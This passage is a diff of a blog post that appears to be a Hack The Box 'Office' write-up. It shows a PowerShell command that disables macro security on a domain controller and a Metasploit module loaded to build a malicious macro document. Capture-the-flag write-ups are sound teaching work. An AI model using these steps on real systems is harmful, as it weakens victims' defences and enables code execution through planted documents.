bytebl33d/bytebl33d.github.io/_posts/2024-07-16-htb-office.md

 (remote) tstark@DC:C:\$ Set-ItemProperty -Path "$key\MacroSecurityLevel" -Name "Value" -Value 0
 ```

-We can now upload a document with a malicious macro created with MetaSploit and wait for it to get executed.
+We can now create a document with a malicious macro with MetaSploit.

 ```console
 msf6 > use exploit/multi/misc/openoffice_document_macro